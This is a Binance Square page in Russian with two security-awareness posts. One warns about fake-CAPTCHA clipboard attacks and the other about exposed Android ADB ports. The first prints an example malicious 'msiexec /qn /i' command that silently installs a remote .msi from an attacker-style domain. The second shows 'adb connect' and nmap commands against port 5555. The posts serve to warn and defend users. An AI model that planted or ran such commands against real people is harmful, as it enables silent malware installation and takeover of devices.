Binance Square

Sh0fiul

0 подписок(и/а)
14 подписчиков(а)
16 понравилось
0 поделились
Все публикации
--
См. оригинал
CAPTCHA Социальная Инженерия Атака — Будьте Осторожны! Вы стали жертвой атаки социальной инженерии CAPTCHA, даже не подозревая об этом? Этот тип атаки чрезвычайно опасен. Хакеры используют поддельный CAPTCHA, чтобы заставить пользователей думать, что они подтверждают свою человечность — но на самом деле это ловушка. Как работает атака: 1. Вы посещаете вредоносный веб-сайт. 2. Он показывает поддельный CAPTCHA, который говорит: «Пожалуйста, подтвердите, что вы человек.» 3. Как только вы нажимаете на него, вредоносная команда незаметно копируется в ваш буфер обмена, такая как: msiexec /qn /i https://clloudsverify.com/o.msi 4. Затем сайт говорит вам: > «Чтобы завершить проверку, нажмите Win + R, затем Ctrl + V и нажмите Enter.» 5. Не подозревая об этом, вы запускаете вредоносное ПО непосредственно на своей системе через командную строку Windows. Что на самом деле происходит? Команда незаметно устанавливает вредоносный .msi файл с использованием Windows Installer. msiexec — это легитимный инструмент, но когда он используется с /qn /i, он устанавливает вредоносное ПО, не показывая никаких подсказок. Эта техника является комбинацией: Социальная Инженерия CAPTCHA Атака Внедрения в Буфер Обмена Что может делать вредоносное ПО? Устанавливать задние двери или трояны Красть ваши файлы, пароли и банковскую информацию Получать удаленный доступ к вашему ПК (RAT) Распространять программы-вымогатели или шпионские программы Как оставаться в безопасности: * Никогда не следуйте инструкциям типа «Win + R → Ctrl + V» с случайных сайтов Всегда проверяйте содержимое вашего буфера обмена перед вставкой в приложения системного уровня * Избегайте неизвестных CAPTCHA или «проверочных» подсказок на подозрительных веб-сайтах * Используйте антивирусное программное обеспечение, которое отслеживает поведение буфера обмена и установки * Включите историю буфера обмена в Windows, чтобы просматривать недавние записи Последняя мысль: > CAPTCHA ≠ безопасно по умолчанию. Если он предлагает вам открыть командную строку — это не CAPTCHA, это взлом. Оставайтесь информированными. Оставайтесь в безопасности. #CyberSecurity #CAPTCHAattack #ClipboardInjection #HackingAlert #MalwareWarning
CAPTCHA Социальная Инженерия Атака — Будьте Осторожны!

Вы стали жертвой атаки социальной инженерии CAPTCHA, даже не подозревая об этом?

Этот тип атаки чрезвычайно опасен. Хакеры используют поддельный CAPTCHA, чтобы заставить пользователей думать, что они подтверждают свою человечность — но на самом деле это ловушка.

Как работает атака:

1. Вы посещаете вредоносный веб-сайт.

2. Он показывает поддельный CAPTCHA, который говорит:
«Пожалуйста, подтвердите, что вы человек.»

3. Как только вы нажимаете на него, вредоносная команда незаметно копируется в ваш буфер обмена, такая как:
msiexec /qn /i https://clloudsverify.com/o.msi

4. Затем сайт говорит вам:
> «Чтобы завершить проверку, нажмите Win + R, затем Ctrl + V и нажмите Enter.»

5. Не подозревая об этом, вы запускаете вредоносное ПО непосредственно на своей системе через командную строку Windows.

Что на самом деле происходит?

Команда незаметно устанавливает вредоносный .msi файл с использованием Windows Installer.
msiexec — это легитимный инструмент, но когда он используется с /qn /i, он устанавливает вредоносное ПО, не показывая никаких подсказок.

Эта техника является комбинацией:
Социальная Инженерия CAPTCHA
Атака Внедрения в Буфер Обмена

Что может делать вредоносное ПО?

Устанавливать задние двери или трояны
Красть ваши файлы, пароли и банковскую информацию
Получать удаленный доступ к вашему ПК (RAT)
Распространять программы-вымогатели или шпионские программы

Как оставаться в безопасности:

* Никогда не следуйте инструкциям типа «Win + R → Ctrl + V» с случайных сайтов

Всегда проверяйте содержимое вашего буфера обмена перед вставкой в приложения системного уровня

* Избегайте неизвестных CAPTCHA или «проверочных» подсказок на подозрительных веб-сайтах
* Используйте антивирусное программное обеспечение, которое отслеживает поведение буфера обмена и установки
* Включите историю буфера обмена в Windows, чтобы просматривать недавние записи

Последняя мысль:
> CAPTCHA ≠ безопасно по умолчанию.
Если он предлагает вам открыть командную строку — это не CAPTCHA, это взлом.

Оставайтесь информированными. Оставайтесь в безопасности.

#CyberSecurity #CAPTCHAattack #ClipboardInjection #HackingAlert #MalwareWarning
См. оригинал
Что произойдет, если ваш порт ADB открыт? | Скрытая угроза взлома! Вы знали, что на вашем Android-телефоне может быть открыта секретная лазейка? Она называется порт ADB (5555) — и хакеры это любят! 🛠️ ADB (Android Debug Bridge) позволяет разработчикам: Переносить файлы Устанавливать/удалять приложения Получать доступ к системной оболочке Но если кто-то выполнит: adb tcpip 5555 ADB переходит в режим WiFi, открывая порт 5555 для локальной сети. ⚠️ Что могут сделать хакеры? Если вы находитесь в одной сети WiFi с хакером и порт ADB открыт, он может: Подключиться к вашему телефону: adb connect ваш_ip:5555 Скопировать все ваши файлы Получить доступ к камере/микрофону Перезагрузить ваш телефон Тихо установить вредоносное ПО 🔍 Как проверить: Перейдите в: Настройки > Параметры разработчика > Беспроводная отладка Или используйте: nmap -p 5555 [device_ip] 🛡️ Оставайтесь в безопасности: Выключите беспроводную отладку, когда она не нужна Избегайте использования режима разработчика в общественных сетях WiFi Отключите ADB через WiFi: adb usb Избегайте подозрительных приложений с разрешениями, связанными с ADB 🔐 Порт ADB = Открытая дверь Если дверь открыта, кто-то войдет. Будьте осторожны, оставайтесь защищенными. #CyberSecurity #AndroidSecurity #TechAwareness #MobileSecurity #Binacefeed
Что произойдет, если ваш порт ADB открыт? | Скрытая угроза взлома!

Вы знали, что на вашем Android-телефоне может быть открыта секретная лазейка?
Она называется порт ADB (5555) — и хакеры это любят!

🛠️ ADB (Android Debug Bridge) позволяет разработчикам:

Переносить файлы
Устанавливать/удалять приложения
Получать доступ к системной оболочке

Но если кто-то выполнит:
adb tcpip 5555
ADB переходит в режим WiFi, открывая порт 5555 для локальной сети.

⚠️ Что могут сделать хакеры?

Если вы находитесь в одной сети WiFi с хакером и порт ADB открыт, он может:

Подключиться к вашему телефону:
adb connect ваш_ip:5555

Скопировать все ваши файлы
Получить доступ к камере/микрофону
Перезагрузить ваш телефон
Тихо установить вредоносное ПО

🔍 Как проверить:
Перейдите в: Настройки > Параметры разработчика > Беспроводная отладка

Или используйте:
nmap -p 5555 [device_ip]

🛡️ Оставайтесь в безопасности:

Выключите беспроводную отладку, когда она не нужна

Избегайте использования режима разработчика в общественных сетях WiFi

Отключите ADB через WiFi:

adb usb

Избегайте подозрительных приложений с разрешениями, связанными с ADB

🔐 Порт ADB = Открытая дверь
Если дверь открыта, кто-то войдет. Будьте осторожны, оставайтесь защищенными.

#CyberSecurity #AndroidSecurity #TechAwareness #MobileSecurity
#Binacefeed
Войдите, чтобы посмотреть больше материала
Последние новости криптовалют
⚡️ Участвуйте в последних обсуждениях в криптомире
💬 Общайтесь с любимыми авторами
👍 Изучайте темы, которые вам интересны
Эл. почта/номер телефона

Последние новости

--
Подробнее

Популярные статьи

nooriiik
Подробнее
Структура веб-страницы
Настройки cookie
Правила и условия платформы